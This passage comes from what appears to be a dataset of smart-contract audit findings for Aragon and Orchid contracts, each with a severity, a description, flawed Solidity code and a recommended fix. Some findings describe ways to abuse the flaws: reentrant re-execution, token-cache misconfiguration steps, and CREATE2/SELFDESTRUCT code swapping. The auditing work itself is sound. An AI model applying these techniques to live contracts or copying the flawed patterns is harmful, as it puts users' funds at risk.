agentOrVault = \\_useAgentAsVault ? 
\\_installDefaultAgentApp(\\_dao) : \\_installVaultApp(\\_dao);\\n TokenManager tokenManager = \\_installTokenManagerApp(\\_dao, token, TOKEN\\_TRANSFERABLE, TOKEN\\_MAX\\_PER\\_ACCOUNT);\\n Finance finance = \\_installFinanceApp(\\_dao, agentOrVault, \\_financePeriod == 0 ? DEFAULT\\_FINANCE\\_PERIOD : \\_financePeriod);\\n\\n \\_mintTokens(\\_acl, tokenManager, \\_holders, \\_stakes);\\n \\_saveBaseApps(\\_dao, finance, tokenManager, agentOrVault);\\n \\_saveAgentAsVault(\\_dao, \\_useAgentAsVault);\\n\\n}\\n```\\n\\nNote that `newToken` and `newBaseInstance` can be called separately. The token created in `newToken` is cached in `_saveToken`, which overwrites any previously-cached value:\\n```\\nfunction \\_saveToken(MiniMeToken \\_token) internal {\\n DeployedContracts storage senderDeployedContracts = deployedContracts[msg.sender];\\n\\n senderDeployedContracts.token = address(\\_token);\\n}\\n```\\n\\nCached tokens are retrieved in _getToken:\\n```\\nfunction \\_getToken() internal returns (MiniMeToken) {\\n DeployedContracts storage senderDeployedContracts = deployedContracts[msg.sender];\\n require(senderDeployedContracts.token != address(0), ERROR\\_MISSING\\_TOKEN\\_CONTRACT);\\n\\n MiniMeToken token = MiniMeToken(senderDeployedContracts.token);\\n return token;\\n}\\n```\\n\\nBy exploiting the overwriteable caching mechanism, it is possible to intentionally misconfigure Dandelion orgs.\\n`installDandelionApps` uses `_getToken` to associate a token with the `DandelionVoting` app. The value returned from `_getToken` depends on the sender's previous call to `newToken`, which overwrites any previously-cached value. 
The steps for intentional misconfiguration are as follows:\\nSender calls `newTokenAndBaseInstance`, creating token `m0` and DAO `A`.\\nThe `TokenManager` app in `A` is automatically configured to be the controller of `m0`.\\n`m0` is cached using `_saveToken`.\\nDAO `A` apps are cached for future use using `_saveBaseApps` and `_saveAgentAsVault`.\\nSender calls `newToken`, creating token `m1`, and overwriting the cache of `m0`.\\nFuture calls to `_getToken` will retrieve `m1`.\\nThe `DandelionOrg` contract is the controller of `m1`.\\nSender calls `installDandelionApps`, which installs Dandelion apps in DAO `A`\\nThe `DandelionVoting` app is configured to use the current cached token, `m1`, rather than the token associated with `A.TokenManager`, `m0`\\nFurther calls to `newBaseInstance` and `installDandelionApps` create DAO `B`, populate it with Dandelion apps, and assign `B.TokenManager` as the controller of the earlier `DandelionVoting` app token, `m0`.\\nMany different misconfigurations are possible, and some may be underhandedly abusable.",Make `newToken` and `newBaseInstance` internal so they are only callable via `newTokenAndBaseInstance`.,,"```\\n/\\*\\*\\n\\* @dev Create a new MiniMe token and save it for the user\\n\\* @param \\_name String with the name for the token used by share holders in the organization\\n\\* @param \\_symbol String with the symbol for the token used by share holders in the organization\\n\\*/\\nfunction newToken(string memory \\_name, string memory \\_symbol) public returns (MiniMeToken) {\\n MiniMeToken token = \\_createToken(\\_name, \\_symbol, TOKEN\\_DECIMALS);\\n \\_saveToken(token);\\n return token;\\n}\\n```\\n" +Delay.execute can re-enter and re-execute the same script twice,low,"`Delay.execute` does not follow the “checks-effects-interactions” pattern, and deletes a delayed script only after the script is run. 
Because the script being run executes arbitrary external calls, a script can be created that re-enters `Delay` and executes itself multiple times before being deleted:\\n```\\n/\\*\\*\\n\\* @notice Execute the script with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script to execute\\n\\*/\\nfunction execute(uint256 \\_delayedScriptId) external {\\n require(canExecute(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_EXECUTE);\\n runScript(delayedScripts[\\_delayedScriptId].evmCallScript, new bytes(0), new address[](0));\\n\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutedScript(\\_delayedScriptId);\\n}\\n```\\n","Add the `Delay` contract address to the `runScript` blacklist, or delete the delayed script from storage before it is run.",,"```\\n/\\*\\*\\n\\* @notice Execute the script with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script to execute\\n\\*/\\nfunction execute(uint256 \\_delayedScriptId) external {\\n require(canExecute(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_EXECUTE);\\n runScript(delayedScripts[\\_delayedScriptId].evmCallScript, new bytes(0), new address[](0));\\n\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutedScript(\\_delayedScriptId);\\n}\\n```\\n" +Delay.cancelExecution should revert on a non-existent script id,low,"`cancelExecution` makes no existence check on the passed-in script ID, clearing its storage slot and emitting an event:\\n```\\n/\\*\\*\\n\\* @notice Cancel script execution with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of the script execution to cancel\\n\\*/\\nfunction cancelExecution(uint256 \\_delayedScriptId) external auth(CANCEL\\_EXECUTION\\_ROLE) {\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutionCancelled(\\_delayedScriptId);\\n}\\n```\\n",Add a check that the passed-in script exists.,,```\\n/\\*\\*\\n\\* @notice Cancel script execution with ID `\\_delayedScriptId`\\n\\* @param \\_delayedScriptId The ID of 
the script execution to cancel\\n\\*/\\nfunction cancelExecution(uint256 \\_delayedScriptId) external auth(CANCEL\\_EXECUTION\\_ROLE) {\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutionCancelled(\\_delayedScriptId);\\n}\\n```\\n +ID validation check missing for installDandelionApps,low,"`DandelionOrg` allows users to kickstart an Aragon organization by using a dao template. There are two primary functions to instantiate an org: `newTokenAndBaseInstance`, and `installDandelionApps`. Both functions accept a parameter, `string _id`, meant to represent an ENS subdomain that will be assigned to the new org during the instantiation process. The two functions are called independently, but depend on each other.\\nIn `newTokenAndBaseInstance`, a sanity check is performed on the `_id` parameter, which ensures the `_id` length is nonzero:\\n```\\n\\_validateId(\\_id);\\n```\\n\\nNote that the value of `_id` is otherwise unused in `newTokenAndBaseInstance`.\\nIn `installDandelionApps`, this check is missing. The check is only important in this function, since it is in `installDandelionApps` that the ENS subdomain registration is actually performed.","Use `_validateId` in `installDandelionApps` rather than `newTokenAndBaseInstance`. Since the `_id` parameter is otherwise unused in `newTokenAndBaseInstance`, it can be removed.\\nAlternatively, the value of the submitted `_id` could be cached between calls and validated in `newTokenAndBaseInstance`, similarly to `newToken`.",,```\\n\\_validateId(\\_id);\\n```\\n +EOPBCTemplate - permission documentation inconsistencies,high,"Undocumented\\nThe template documentation provides an overview of the permissions set with the template. 
The following permissions are set by the template contract but are not documented in the accompanied `fundraising/templates/externally_owned_presale_bonding_curve/README.md`.\\nTokenManager\\n```\\n\\_createPermissions(\\_acl, grantees, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.MINT\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_fundraisingApps.marketMaker, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.BURN\\_ROLE(), \\_owner);\\n```\\n\\ncode/fundraising/templates/externally_owned_presale_bonding_curve/eopbc.yaml:L33-L44\\n```\\n- app: anj-token-manager\\n role: MINT\\_ROLE\\n grantee: market-maker\\n manager: owner\\n- app: anj-token-manager\\n role: MINT\\_ROLE\\n grantee: presale\\n manager: owner\\n- app: anj-token-manager\\n role: BURN\\_ROLE\\n grantee: market-maker\\n manager: owner\\n```\\n\\nInconsistent\\nThe following permissions are set by the template but are inconsistent to the outline in the documentation:\\nController\\n`owner` has the following permissions even though they are documented as not being set https://github.com/ConsenSys/aragonone-presale-audit-2019-11/blob/9ddae8c7fde9dea3af3982b965a441239d81f370/code/fundraising/templates/externally_owned_presale_bonding_curve/README.md#controller.\\n```\\n| App | Permission | Grantee | Manager |\\n| ---------- | ------------------------------------- | ------- | ------- |\\n| Controller | UPDATE_BENEFICIARY | NULL | NULL |\\n| Controller | UPDATE_FEES | NULL | NULL |\\n| Controller | ADD_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | REMOVE_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | UPDATE_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | UPDATE_MAXIMUM_TAP_RATE_INCREASE_PCT | NULL | NULL |\\n| Controller | UPDATE_MAXIMUM_TAP_FLOOR_DECREASE_PCT | NULL | NULL |\\n| Controller | ADD_TOKEN_TAP | NULL | NULL |\\n| Controller | UPDATE_TOKEN_TAP | NULL | NULL |\\n| Controller | OPEN_PRESALE | Owner | Owner |\\n| Controller 
| OPEN_TRADING | Presale | Owner |\\n| Controller | CONTRIBUTE | Any | Owner |\\n| Controller | OPEN_BUY_ORDER | Any | Owner |\\n| Controller | OPEN_SELL_ORDER | Any | Owner |\\n| Controller | WITHDRAW | NULL | NULL |\\n```\\n\\n```\\n\\_acl.createPermission(\\_owner, \\_fundraisingApps.controller, \\_fundraisingApps.controller.UPDATE\\_BENEFICIARY\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_owner, \\_fundraisingApps.controller, \\_fundraisingApps.controller.UPDATE\\_FEES\\_ROLE(), \\_owner);\\n```\\n","Resolution\\nFixed with aragonone/[email protected]bafe100 by adding the undocumented and deviating permissions to the documentation.\\nFor transparency, all permissions set-up by the template must be documented.",,"```\\n\\_createPermissions(\\_acl, grantees, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.MINT\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_fundraisingApps.marketMaker, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.BURN\\_ROLE(), \\_owner);\\n```\\n" +EOPBCTemplate - AppId of BalanceRedirectPresale should be different from AragonBlack/Presale namehash to avoid collisions,high,"The template references the new presale contract with `apmNamehash` `0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5`. However, this namehash is already used by the aragonBlack/Presale contract. To avoid confusion and collision a unique `apmNamehash` should be used for this variant of the contract.\\nNote that the contract that is referenced from an `apmNamehash` is controlled by the `ENS` resolver that is configured when deploying the template contract. Using the same namehash for both variants of the contract does not allow a single registry to simultaneously provide both variants of the contract and might lead to confusion as to which application is actually deployed. 
This also raises the issue that the `ENS` registry must be verified before actually using the contract as a malicious registry could force the template to deploy potentially malicious applications.\\naragonOne/Fundraising:\\n```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n\\naragonBlack/Fundraising:\\n```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n\\n`bytes32 private constant PRESALE_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;`",Create a new `apmNamehash` for `BalanceRedirectPresale`.,,```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n +BalanceRedirectPresale - Presale can be extended indefinitely Won't Fix,high,"The `OPEN_ROLE` can indefinitely extend the Presale even after users contributed funds to it by adjusting the presale period. The period might be further manipulated to avoid that token trading in the MarketMaker is opened.\\n```\\nfunction setPeriod(uint64 \\_period) external auth(OPEN\\_ROLE) {\\n \\_setPeriod(\\_period);\\n}\\n```\\n\\n```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\n",Do not allow to extend the presale after funds have been contributed to it or only allow period adjustments in `State.PENDING`.,,```\\nfunction setPeriod(uint64 \\_period) external auth(OPEN\\_ROLE) {\\n \\_setPeriod(\\_period);\\n}\\n```\\n +BalanceRedirectPresale - setPeriod uint64 overflow in validation check,medium,"`setPeriod()` allows setting an arbitrary Presale starting date. The method can be called by an entity with the `OPEN_ROLE` permission. 
Providing a large enough value for `uint64 _period` can overflow the second input validation check. The result is unwanted behaviour where for relatively large values of `period` the require might fail because the overflow `openDate + _period` is less than or equal to the current timestamp (getTimestamp64()) but if high enough it still might succeed because `openDate + _period` is higher than the current timestamp. The overflow has no effect on the presale end as it is calculated against `_timeSinceOpen`.\n```\nfunction \_setPeriod(uint64 \_period) internal {\n require(\_period > 0, ERROR\_TIME\_PERIOD\_ZERO);\n require(openDate == 0 || openDate + \_period > getTimestamp64(), ERROR\_INVALID\_TIME\_PERIOD);\n period = \_period;\n}\n```\n\n",Resolution\nFixed with aragonone/[email protected]bafe100 by performing the addition using `SafeMath`.\nUse `SafeMath` which is already imported to protect from overflow scenarios.,,"```\nfunction \_setPeriod(uint64 \_period) internal {\n require(\_period > 0, ERROR\_TIME\_PERIOD\_ZERO);\n require(openDate == 0 || openDate + \_period > getTimestamp64(), ERROR\_INVALID\_TIME\_PERIOD);\n period = \_period;\n}\n```\n" +EOPBCTemplate - misleading method names _cacheFundraisingApps and _cacheFundraisingParams,low,"The methods `_cacheFundraisingApps` and `_cacheFundraisingParams` suggest that parameters are cached as state variables in the contract similar to the multi-step deployment contract used for AragonBlack/Fundraising. 
However, the methods are just returning memory structs.\\n```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n{\\n fundraisingParams = FundraisingParams({\\n owner: \\_owner,\\n id: \\_id,\\n collateralToken: \\_collateralToken,\\n bondedToken: \\_bondedToken,\\n period: \\_period,\\n exchangeRate: \\_exchangeRate,\\n openDate: \\_openDate,\\n reserveRatio: \\_reserveRatio,\\n batchBlocks: \\_batchBlocks,\\n slippage: \\_slippage\\n });\\n}\\n```\\n",The functions are only called once throughout the deployment process. The structs can therefore be created directly in the main method. 
Otherwise rename the functions to properly reflect their purpose.,,"```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n{\\n fundraisingParams = FundraisingParams({\\n owner: \\_owner,\\n id: \\_id,\\n collateralToken: \\_collateralToken,\\n bondedToken: \\_bondedToken,\\n period: \\_period,\\n exchangeRate: \\_exchangeRate,\\n openDate: \\_openDate,\\n reserveRatio: \\_reserveRatio,\\n batchBlocks: \\_batchBlocks,\\n slippage: \\_slippage\\n });\\n}\\n```\\n" +EOPBCTemplate - inconsistent storage location declaration,low,"`_cacheFundraisingParams()` does not explicitly declare the return value memory location.\\n```\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n```\\n\\n`_cacheFundraisingApps()` explicitly declares to return a copy of the storage struct.\\n```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale 
\\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n```\\n",Resolution\\nFixed with aragonone/[email protected]bafe100 by adding the missing storage location declaration.\\nStorage declarations should be consistent.,,"```\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n```\\n" +EOPBCTemplate - EtherTokenConstant is never used,low,"The constant value `EtherTokenConstant.ETH` is never used.\\n```\\ncontract EOPBCTemplate is EtherTokenConstant, BaseTemplate {\\n```\\n",Resolution\\nFixed with aragonone/[email protected]bafe100 by removing the `EtherTokenConstant` dependency.\\nRemove all references to `EtherTokenConstant`.,,"```\\ncontract EOPBCTemplate is EtherTokenConstant, BaseTemplate {\\n```\\n" +Staking node can be inappropriately removed from the tree,high,"The following code in `OrchidDirectory.pull()` is responsible for reattaching a child from a removed tree node:\\n```\\nif (name(stake.left\\_) == key) {\\n current.right\\_ = stake.right\\_;\\n current.after\\_ = stake.after\\_;\\n} else {\\n current.left\\_ = stake.left\\_;\\n current.before\\_ = stake.before\\_;\\n}\\n```\\n\\nThe condition name(stake.left_) == `key` can never hold because `key` is the `key` for `stake` itself.\\nThe result of this bug is somewhat catastrophic. 
The child is not reattached, but it still has a link to the rest of the tree via its ‘parent_' pointer. This means reducing the stake of that node can underflow the ancestors' before/after amounts, leading to improper random selection or failing altogether.\\nThe node replacing the removed node also ends up with itself as a child, which violates the basic tree structure and is again likely to produce integer underflows and other failures.","As a simple fix, use `if(name(stake.left_) == name(last))` as already suggested by the development team when this bug was first shared.\\nTwo suggestions for better long-term fixes:\\nUse a strict interface for tree operations. It should be impossible to update a node's parent without simultaneously updating that parent's child pointer.\\nAs suggested in (https://github.com/ConsenSys/orchid-audit-2019-10/issues/7), simplify the logic in `pull()` to avoid this logic altogether.",,```\\nif (name(stake.left\\_) == key) {\\n current.right\\_ = stake.right\\_;\\n current.after\\_ = stake.after\\_;\\n} else {\\n current.left\\_ = stake.left\\_;\\n current.before\\_ = stake.before\\_;\\n}\\n```\\n +"Verifiers need to be pure, but it's very difficult to validate pureness",medium,"After the initial audit, a “verifier” was introduced to the `OrchidLottery` code. Each `Pot` can have an associated `OrchidVerifier`. This is a contract with a `good()` function that accepts three parameters:\\n```\\nfunction good(bytes calldata shared, address target, bytes calldata receipt) external pure returns (bool);\\n```\\n\\nThe verifier returns a boolean indicating whether a given micropayment should be allowed or not. An example use case is a verifier that only allows certain `target` addresses to be paid. 
In this case, `shared` (a single value for a given Pot) is a merkle root, `target` is (as always) the address being paid, and `receipt` (specified by the payment recipient) is a merkle proof that the `target` address is within the merkle tree with the given root.\\nA server providing bandwidth needs to know whether to accept a certain receipt. To do that, it needs to know that at some time in the future, a call to the verifier's `good()` function with a particular set of parameters will return `true`. The proposed scheme for determining that is for the server to run the contract's code locally and ensure that it returns `true` and that it doesn't execute any EVM opcodes that would read state. This prevents, for example, a contract from returning `true` until a certain timestamp and then start returning `false`. If a contract could do that, the server would be tricked into providing bandwidth without then receiving payment.\\nUnfortunately, this simple scheme is insufficient. As a simple example, a verifier contract could be created with the `CREATE2` opcode. It could be demonstrated that it reads no state when `good()` is called. Then the contract could be destroyed by calling a function that performs a `SELFDESTRUCT`, and it could be replaced via another `CREATE2` call with different code.\\nThis could be mitigated by rejecting any verifier contract that contains the `SELFDESTRUCT` opcode, but this would also catch harmless occurrences of that particular byte. https://gist.github.com/Arachnid/e8f0638dc9f5687ff8170a95c47eac1e attempts to find `SELFDESTRUCT` opcodes but fails to account for tricks where the `SELFDESTRUCT` appears to be data but can actually be executed. (See Recmo's comment.) In general, this approach is difficult to get right and probably requires full data flow analysis to be correct.\\nAnother possible mitigation is to use a factory contract to deploy the verifiers, guaranteeing that they're not created with `CREATE2`. 
This should render `SELFDESTRUCT` harmless, but there's no guarantee that future forks won't introduce new vectors here.\\nFinally, requiring servers to implement potentially complex contract validation opens up potential for denial-of-service attacks. A server will have to implement mitigations to prevent repeatedly checking the same verifier or spending inordinate resources checking a maliciously crafted contract (e.g. one with high branching factors).","The verifiers add quite a bit of complexity and risk. We recommend looking for an alternative approach, such as including a small number of vetted verifiers (e.g. a merkle proof verifier) or having servers use their own “allow list” for verifiers that they trust.",,"```\\nfunction good(bytes calldata shared, address target, bytes calldata receipt) external pure returns (bool);\\n```\\n" +"Use consistent staker, stakee ordering in OrchidDirectory",low,"```\\nfunction lift(bytes32 key, Stake storage stake, uint128 amount, address stakee, address staker) private {\\n```\\n\\n`OrchidDirectory.lift()` has a parameter `stakee` that precedes `staker`, while the rest of the code always places `staker` first. Because Solidity doesn't have named parameters, it's a good idea to use a consistent ordering to avoid mistakes.",Resolution\\nThis is fixed in OrchidProtocol/[email protected]1cfef88.\\nSwitch `lift()` to follow the “staker then stakee” ordering convention of the rest of the contract.,,"```\\nfunction lift(bytes32 key, Stake storage stake, uint128 amount, address stakee, address staker) private {\\n```\\n" +"In OrchidDirectory.step() and OrchidDirectory.lift(), use a signed amount Won't Fix",low,"`step()` and `lift()` both accept a `uint128` parameter called `amount`. This `amount` is added to various struct fields, which are also of type `uint128`.\\nThe contract intentionally underflows this `amount` to represent negative numbers. 
This is roughly equivalent to using a signed integer, except that:\\nUnsigned integers aren't sign extended when they're cast to a larger integer type, so care must be taken to avoid this.\\nTools that look for integer overflow/underflow will detect this possibility as a bug. It's then hard to determine which overflows are intentional and which are not.\\n```\\nlift(key, stake, -amount, stakee, staker);\\n```\\n\\n```\\nstep(key, stake, -current.amount\\_, current.parent\\_);\\n```\\n","Resolution\\nThe variables in question are now uint256s. The amount of type casts that would be needed in case the recommended change was implemented would defeat the purpose of simplification.\\nUse `int128` instead, and ensure that amounts can never exceed the maximum `int128` value. (This is trivially achieved by limiting the total number of tokens that can exist.)",,"```\\nlift(key, stake, -amount, stakee, staker);\\n```\\n" +Document that math in OrchidDirectory assumes a maximum number of tokens,low,"`OrchidDirectory` relies on mathematical operations being unable to overflow due to the particular ERC20 token being used being capped at less than `2**128`.\\nThe following code in `step()` assumes that no before/after amount can reach 2**128:\\n```\\nif (name(stake.left\\_) == key)\\n stake.before\\_ += amount;\\nelse\\n stake.after\\_ += amount;\\n```\\n\\nThe following code in `lift()` assumes that no staked amount (or total amount for a given stakee) can reach 2**128:\\n```\\nuint128 local = stake.amount\\_;\\nlocal += amount;\\nstake.amount\\_ = local;\\nemit Update(staker, stakee, local);\\n\\nuint128 global = stakees\\_[stakee].amount\\_;\\nglobal += amount;\\nstakees\\_[stakee].amount\\_ = global;\\n```\\n\\nThe following code in `have()` assumes that the total amount staked cannot reach 2**128:\\n```\\nreturn stake.before\\_ + stake.after\\_ + stake.amount\\_;\\n```\\n",Document this assumption in the form of code comments where potential overflows exist.\\nConsider also 
asserting the ERC20 token's total supply in the constructor to attempt to block using a token that violates this constraint and/or checking in `push()` that the total amount staked will remain less than `2**128`. This recommendation is in line with the mitigation proposed for issue 6.7.,,```\\nif (name(stake.left\\_) == key)\\n stake.before\\_ += amount;\\nelse\\n stake.after\\_ += amount;\\n```\\n +Fees can be changed during the batch,high,"Shareholders can vote to change the fees. For buy orders, fees are withdrawn immediately when order is submitted and the only risk is frontrunning by the shareholder's voting contract.\\nFor sell orders, fees are withdrawn when a trader claims an order and withdraws funds in `_claimSellOrder` function:\\n```\\nif (fee > 0) {\\n reserve.transfer(\\_collateral, beneficiary, fee);\\n}\\n```\\n\\nFees can be changed between opening order and claiming this order which makes the fees unpredictable.",Resolution\\nFixed with AragonBlack/[email protected]0941f53 by storing current fee in meta batch.\\nFees for an order should not be updated during its lifetime.,,"```\\nif (fee > 0) {\\n reserve.transfer(\\_collateral, beneficiary, fee);\\n}\\n```\\n" +Bancor formula should not be updated during the batch,high,"Shareholders can vote to change the bancor formula contract. 
That can make a price in the current batch unpredictable.\\n```\\nfunction updateFormula(IBancorFormula \\_formula) external auth(UPDATE\\_FORMULA\\_ROLE) {\\n require(isContract(\\_formula), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateFormula(\\_formula);\\n}\\n```\\n",Bancor formula update should be executed in the next batch or with a timelock that is greater than batch duration.,,"```\\nfunction updateFormula(IBancorFormula \\_formula) external auth(UPDATE\\_FORMULA\\_ROLE) {\\n require(isContract(\\_formula), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateFormula(\\_formula);\\n}\\n```\\n" +Maximum slippage shouldn't be updated for the current batch,high,"When anyone submits a new order, the batch price is updated and it's checked whether the price slippage is acceptable. The problem is that the maximum slippage can be updated during the batch and traders cannot be sure that price is limited as they initially expected.\\n```\\nfunction \\_slippageIsValid(Batch storage \\_batch, address \\_collateral) internal view returns (bool) {\\n uint256 staticPricePPM = \\_staticPricePPM(\\_batch.supply, \\_batch.balance, \\_batch.reserveRatio);\\n uint256 maximumSlippage = collaterals[\\_collateral].slippage;\\n```\\n\\nAdditionally, if a maximum slippage is updated to a lower value, some of the orders that should lower the current slippage will also revert.",Save a slippage value on batch initialization and use it during the current batch.,,"```\\nfunction \\_slippageIsValid(Batch storage \\_batch, address \\_collateral) internal view returns (bool) {\\n uint256 staticPricePPM = \\_staticPricePPM(\\_batch.supply, \\_batch.balance, \\_batch.reserveRatio);\\n uint256 maximumSlippage = collaterals[\\_collateral].slippage;\\n```\\n" +AragonFundraisingController - an untapped address in toReset can block attempts of opening Trading after presale,high,"AragonFundraisingController can be initialized with a list of token addresses `_toReset` that are to be reset when trading 
opens after the presale. These addresses are supposed to be addresses of tapped tokens. However, the list needs to be known when initializing the contract but the tapped tokens are added after initialization when calling `addCollateralToken` (and tapped with _rate>0). This can lead to an inconsistency that blocks `openTrading`.\\n```\\nfor (uint256 i = 0; i < \\_toReset.length; i++) {\\n require(\\_tokenIsContractOrETH(\\_toReset[i]), ERROR\\_INVALID\\_TOKENS);\\n toReset.push(\\_toReset[i]);\\n}\\n```\\n\\nIn case a token address makes it into the list of `toReset` tokens that is not tapped it will be impossible to `openTrading` as `tap.resetTappedToken(toReset[i]);` throws for untapped tokens. According to the permission setup in `FundraisingMultisigTemplate` only Controller can call `Marketmaker.open`\\n```\\nfunction openTrading() external auth(OPEN\\_TRADING\\_ROLE) {\\n for (uint256 i = 0; i < toReset.length; i++) {\\n tap.resetTappedToken(toReset[i]);\\n }\\n\\n marketMaker.open();\\n}\\n```\\n","Instead of initializing the Controller with a list of tapped tokens to be reset when trading opens, add a flag to `addCollateralToken` to indicate that the token should be reset when calling `openTrading`, making sure only tapped tokens are added to this list. 
This also allows adding tapped tokens that are to be reset at a later point in time.",,"```\\nfor (uint256 i = 0; i < \\_toReset.length; i++) {\\n require(\\_tokenIsContractOrETH(\\_toReset[i]), ERROR\\_INVALID\\_TOKENS);\\n toReset.push(\\_toReset[i]);\\n}\\n```\\n" +[New] Tapped collaterals can be bought by traders Won't Fix,medium,"When a trader submits a sell order, `_openSellOrder()` function checks that there are enough tokens in `reserve` by calling `_poolBalanceIsSufficient` function\\n```\\nfunction \\_poolBalanceIsSufficient(address \\_collateral) internal view returns (bool) {\\n return controller.balanceOf(address(reserve), \\_collateral) >= collateralsToBeClaimed[\\_collateral];\\n}\\n```\\n\\nthe problem is that because `collateralsToBeClaimed[_collateral]` has increased, `controller.balanceOf(address(reserve), _collateral)` could also increase. It happens so because `controller.balanceOf()` function subtracts tapped amount from the reserve's balance.\\n```\\nfunction balanceOf(address \\_who, address \\_token) public view isInitialized returns (uint256) {\\n uint256 balance = \\_token == ETH ? \\_who.balance : ERC20(\\_token).staticBalanceOf(\\_who);\\n\\n if (\\_who == address(reserve)) {\\n return balance.sub(tap.getMaximumWithdrawal(\\_token));\\n } else {\\n return balance;\\n }\\n}\\n```\\n\\nAnd `tap.getMaximumWithdrawal(_token)` could decrease because it depends on `collateralsToBeClaimed[_collateral]`\\n```\\nfunction \\_tappedAmount(address \\_token) internal view returns (uint256) {\\n uint256 toBeKept = controller.collateralsToBeClaimed(\\_token).add(floors[\\_token]);\\n uint256 balance = \\_token == ETH ? 
